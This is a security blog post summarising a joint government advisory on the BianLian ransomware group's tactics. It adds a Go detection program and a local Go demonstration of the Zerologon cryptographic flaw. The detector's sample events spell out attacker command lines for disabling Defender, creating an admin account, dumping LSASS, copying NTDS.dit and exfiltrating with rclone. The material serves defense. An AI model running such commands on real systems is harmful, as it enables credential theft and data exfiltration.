
Tenable Blog


U.S. and Australian Agencies Publish Joint Cybersecurity Advisory on BianLian Ransomware Group

The FBI, ACSC and CISA have released a joint cybersecurity advisory discussing the BianLian ransomware group.

Background

As part of the #StopRansomware campaign, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA) in the U.S. and the Australian Cyber Security Centre (ACSC) released a joint cybersecurity advisory (CSA AA23-136A) discussing the BianLian ransomware group. The advisory details the tactics, techniques and procedures (TTPs) and indicators of compromise (IOCs) associated with the group and its corresponding malware.

Tweet from BetterCyber in July 2022 discussing the “new” ransomware group called BianLian

The BianLian ransomware operation emerged in June 2022 and over the past year has been responsible for a number of attacks targeting critical infrastructure in the U.S. and Australia. The group originally favored double extortion, a tactic in which data is encrypted on the victim's machines and also exfiltrated to the operator's infrastructure, after which samples of the data are advertised on a leak site to publicly shame the victim and pressure it into paying the ransom. This technique was pioneered by the Maze ransomware group in 2019, a phenomenon we discuss in our Ransomware Ecosystem report.

While this technique has helped propel ransomware to new heights, according to the joint advisory, BianLian's tactics changed to exfiltration-only extortion in January 2023, around the same time Avast released a free decryptor for the group's encryptor. BianLian's shift aligns with findings in our 2022 Threat Landscape Report, where we observed an increase in the prominence of extortion-only attacks.

Analysis

Tactics, Techniques and Procedures

According to the cybersecurity advisory, BianLian gains initial access by using compromised Remote Desktop Protocol (RDP) credentials, most likely obtained from initial access brokers or through phishing. Once inside the victim network, the group deploys custom backdoors written in Go and tailor-made for each victim. The group also downloads remote management tools such as TeamViewer or Atera Agent and creates local administrator accounts to maintain persistence.

For defense evasion, the group disables Windows Defender and the Antimalware Scan Interface (AMSI) using PowerShell and the Windows Command Shell. BianLian actors also modify registry keys to disable tamper protection for Sophos services, which lets them uninstall the Sophos antivirus services.

During the discovery phase, the group has been observed using tools such as Advanced Port Scanner and SoftPerfect Network Scanner to identify open ports across the victim network and discover shared folders. The group uses SharpShares to identify network shares and PingCastle to enumerate and map the victim's Active Directory (AD).

To move laterally through the environment, the group gathers credentials from several sources. It uses the Windows Command Shell to search for unsecured local credentials, and has been observed extracting credentials from Local Security Authority Subsystem Service (LSASS) memory, brute-forcing RDP passwords or checking for RDP vulnerabilities with RDP Recognizer, and attempting to access the NTDS.dit Active Directory database.

For data exfiltration, the group uses the File Transfer Protocol (FTP), Rclone and, in at least one instance, the file sharing service Mega to move sensitive data out of the victim network.
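The post-compromise chain described above (Defender disabled via PowerShell, a local administrator account added for persistence, LSASS and NTDS.dit credential theft, Rclone exfiltration) is the kind of sequence that process-creation telemetry can catch. The Go program below is an added example, not code from the advisory or from Tenable: it runs a handful of command-line rules over constructed process-creation records. The command-line patterns (Set-MpPreference -DisableRealtimeMonitoring, net localgroup administrators /add, comsvcs.dll MiniDump, a shadow-copy NTDS.dit copy, rclone copy) are common forms of the techniques the advisory names, chosen here as assumptions rather than taken from its IOC list; the host names, paths and PID in the sample records are invented.

```go
package main

import (
	"fmt"
	"strings"
)

// ProcEvent is a simplified process-creation record carrying the fields a
// Sysmon Event ID 1 or Windows 4688 event would provide. Build these from
// your own telemetry; the samples below are constructed for the demo.
type ProcEvent struct {
	Host        string
	Image       string // full path of the executable
	CommandLine string
}

// Finding ties a matched event to the BianLian phase the advisory describes.
type Finding struct {
	Host  string
	Phase string
	Rule  string
}

// rule is a case-insensitive substring check: every token in 'all' must
// appear in the command line. Patterns are assumptions, not advisory IOCs.
type rule struct {
	phase string
	name  string
	all   []string
}

var rules = []rule{
	{"Defense Evasion", "Defender real-time protection disabled via PowerShell",
		[]string{"set-mppreference", "-disablerealtimemonitoring"}},
	{"Persistence", "Account added to local Administrators group",
		[]string{"localgroup", "administrators", "/add"}},
	{"Credential Access", "LSASS memory dumped with comsvcs.dll MiniDump",
		[]string{"comsvcs", "minidump"}},
	{"Credential Access", "NTDS.dit copied out of a volume shadow copy",
		[]string{"harddiskvolumeshadowcopy", "ntds.dit"}},
	{"Exfiltration", "Rclone copy to a remote storage target",
		[]string{"rclone", "copy"}},
}

func matches(r rule, cmd string) bool {
	lc := strings.ToLower(cmd)
	for _, tok := range r.all {
		if !strings.Contains(lc, tok) {
			return false
		}
	}
	return true
}

// Detect runs every rule over every event and returns the matches in event order.
func Detect(events []ProcEvent) []Finding {
	var out []Finding
	for _, ev := range events {
		for _, r := range rules {
			if matches(r, ev.CommandLine) {
				out = append(out, Finding{ev.Host, r.phase, r.name})
			}
		}
	}
	return out
}

// SampleEvents is a constructed chain mimicking the advisory's TTPs plus one
// benign process; hosts, paths and the PID are invented.
var SampleEvents = []ProcEvent{
	{"FS01", `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
		`powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"`},
	{"FS01", `C:\Windows\System32\net.exe`,
		`net localgroup administrators svc_backup /add`},
	{"DC01", `C:\Windows\System32\rundll32.exe`,
		`rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 712 C:\temp\l.dmp full`},
	{"DC01", `C:\Windows\System32\cmd.exe`,
		`cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit`},
	{"FS01", `C:\Users\Public\rclone.exe`,
		`rclone.exe copy D:\Finance remote:share --transfers 8`},
	{"WS07", `C:\Windows\System32\notepad.exe`, `notepad.exe notes.txt`},
}

func main() {
	for _, f := range Detect(SampleEvents) {
		fmt.Printf("%-5s %-18s %s\n", f.Host, f.Phase, f.Rule)
	}
}
```

The rules are deliberately narrow substring checks so that each maps to one phase of the chain; in production you would key the Defender and Rclone rules on the parent process and on the destination host as well, since a single rclone invocation by an administrator is not by itself evidence of exfiltration.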

Potential use of Zerologon (CVE-2020-1472)

According to the advisory, a forensic artifact found on a compromised system suggests that the group exploited CVE-2020-1472, a privilege escalation vulnerability in the Netlogon Remote Protocol known as Zerologon, which can allow an attacker with network access to compromise a domain controller. Zerologon has been widely favored by threat actors of all types since its disclosure. In fact, CVE-2020-1472 was featured in the top 5 vulnerabilities list two years in a row in the 2020 Threat Landscape Retrospective and 2021 Threat Landscape Retrospective reports.
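Why a Netlogon bug lets an attacker who does not know any password take over a domain controller comes down to one design choice: the ComputeNetlogonCredential function encrypts the 8-byte challenge with AES-128 in CFB8 mode using a fixed all-zero IV. The Go program below is an added example (not from the advisory, from Tenable, or from the Zerologon researchers' tooling) that implements that credential function from the MS-NRPC description and measures the consequence: for 1 in 256 session keys an all-zero client challenge produces an all-zero credential, so an attacker simply retries the authentication with zeros until a server happens to accept them. The CFB8 routine is written by hand because Go's crypto/cipher only offers 128-bit-segment CFB; the key sequence in FindZeroKey and the sampling in ZeroOutputRate are local simulations that never touch a network.

```go
package main

import (
	"crypto/aes"
	"crypto/rand"
	"encoding/binary"
	"fmt"
)

// aesCFB8 encrypts plaintext with AES in 8-bit CFB mode: each step encrypts
// a 16-byte shift register, XORs its first byte with one plaintext byte, then
// shifts the resulting ciphertext byte into the register.
func aesCFB8(key, iv, plaintext []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err) // callers always pass a 16-byte key
	}
	reg := make([]byte, aes.BlockSize)
	copy(reg, iv)
	ks := make([]byte, aes.BlockSize)
	out := make([]byte, len(plaintext))
	for i, p := range plaintext {
		block.Encrypt(ks, reg)
		out[i] = ks[0] ^ p            // only the first keystream byte is used
		copy(reg, reg[1:])            // shift the register left by one byte...
		reg[aes.BlockSize-1] = out[i] // ...and feed the ciphertext byte in
	}
	return out
}

// ComputeNetlogonCredential is the AES flavour of the MS-NRPC credential
// function: the 8-byte challenge is AES-128-CFB8 encrypted under the session
// key with a fixed all-zero IV. The fixed zero IV is the flaw behind Zerologon.
func ComputeNetlogonCredential(sessionKey, challenge []byte) []byte {
	return aesCFB8(sessionKey, make([]byte, aes.BlockSize), challenge)
}

func allZero(b []byte) bool {
	for _, x := range b {
		if x != 0 {
			return false
		}
	}
	return true
}

// YieldsZeroCredential reports whether an all-zero challenge produces an
// all-zero credential under sessionKey. With zero IV and zero plaintext the
// first output byte is AES_k(0)[0]; when it is 0x00 the register stays all
// zero and every later byte is 0x00 too, so this holds for 1 in 256 keys.
func YieldsZeroCredential(sessionKey []byte) bool {
	return allZero(ComputeNetlogonCredential(sessionKey, make([]byte, 8)))
}

// FindZeroKey walks an artificial, deterministic key sequence (the counter
// written into the first 8 bytes of a zero key) and returns the first key
// that accepts a zero challenge, plus the number of keys tried. It stands in
// for the attacker's retry loop, where each attempt gets a fresh session key.
func FindZeroKey(start uint64) ([]byte, int) {
	key := make([]byte, aes.BlockSize)
	for n := 1; ; n++ {
		binary.LittleEndian.PutUint64(key, start+uint64(n))
		if YieldsZeroCredential(key) {
			return key, n
		}
	}
}

// ZeroOutputRate samples random session keys and returns the fraction whose
// CFB8 encryption of an all-zero challenge is all zero. With the protocol's
// zero IV expect about 1/256; with a random IV every one of the eight output
// bytes must independently hit 0x00, so the rate is about 2^-64.
func ZeroOutputRate(trials int, randomIV bool) float64 {
	hits := 0
	key := make([]byte, aes.BlockSize)
	iv := make([]byte, aes.BlockSize) // stays all zero unless randomIV
	zero := make([]byte, 8)
	for i := 0; i < trials; i++ {
		if _, err := rand.Read(key); err != nil {
			panic(err)
		}
		if randomIV {
			if _, err := rand.Read(iv); err != nil {
				panic(err)
			}
		}
		if allZero(aesCFB8(key, iv, zero)) {
			hits++
		}
	}
	return float64(hits) / float64(trials)
}

func main() {
	key, tries := FindZeroKey(0)
	fmt.Printf("key %x accepts a zero challenge after %d tries\n", key, tries)
	fmt.Printf("credential for zero challenge: %x\n", ComputeNetlogonCredential(key, make([]byte, 8)))
	fmt.Printf("rate with zero IV: %.5f (1/256 = %.5f)\n", ZeroOutputRate(50000, false), 1.0/256)
	fmt.Printf("rate with random IV: %.5f\n", ZeroOutputRate(50000, true))
}
```

The random-IV measurement is the control: the same cipher and mode, with a per-call IV, drives the chance of an all-zero credential down to roughly 2^-64, which is why the fixed IV rather than CFB8 itself is the defect. On the defensive side, the August 2020 Windows update enforces secure RPC for Netlogon secure channel connections (controlled on domain controllers by the FullSecureChannelProtection value under HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters), and Event IDs 5827 through 5831 in the System log record vulnerable Netlogon connections that were denied or allowed by policy.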

Reduce your exposure by identifying affected systems

Several of the mitigations discussed in the advisory concern Active Directory hardening. Tenable Identity Exposure (formerly Tenable.ad) can help organizations review Indicators of Exposure such as an unsecured Netlogon protocol configuration and insufficient hardening against ransomware attacks, and use its Indicators of Attack for CVE-2020-1472. We highly recommend reviewing your AD environment as part of your ransomware preparedness strategy, focusing on misconfigurations that may put your organization at risk.

The Tenable One Exposure Management Platform extends beyond traditional vulnerability management, which concentrates on the discovery and remediation of publicly disclosed Common Vulnerabilities and Exposures (CVEs). A foundational part of any exposure management program, Tenable One includes data about configuration issues, vulnerabilities and attack paths across a spectrum of assets and technologies — including identity solutions (e.g., Active Directory); cloud configurations and deployments; and web applications.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
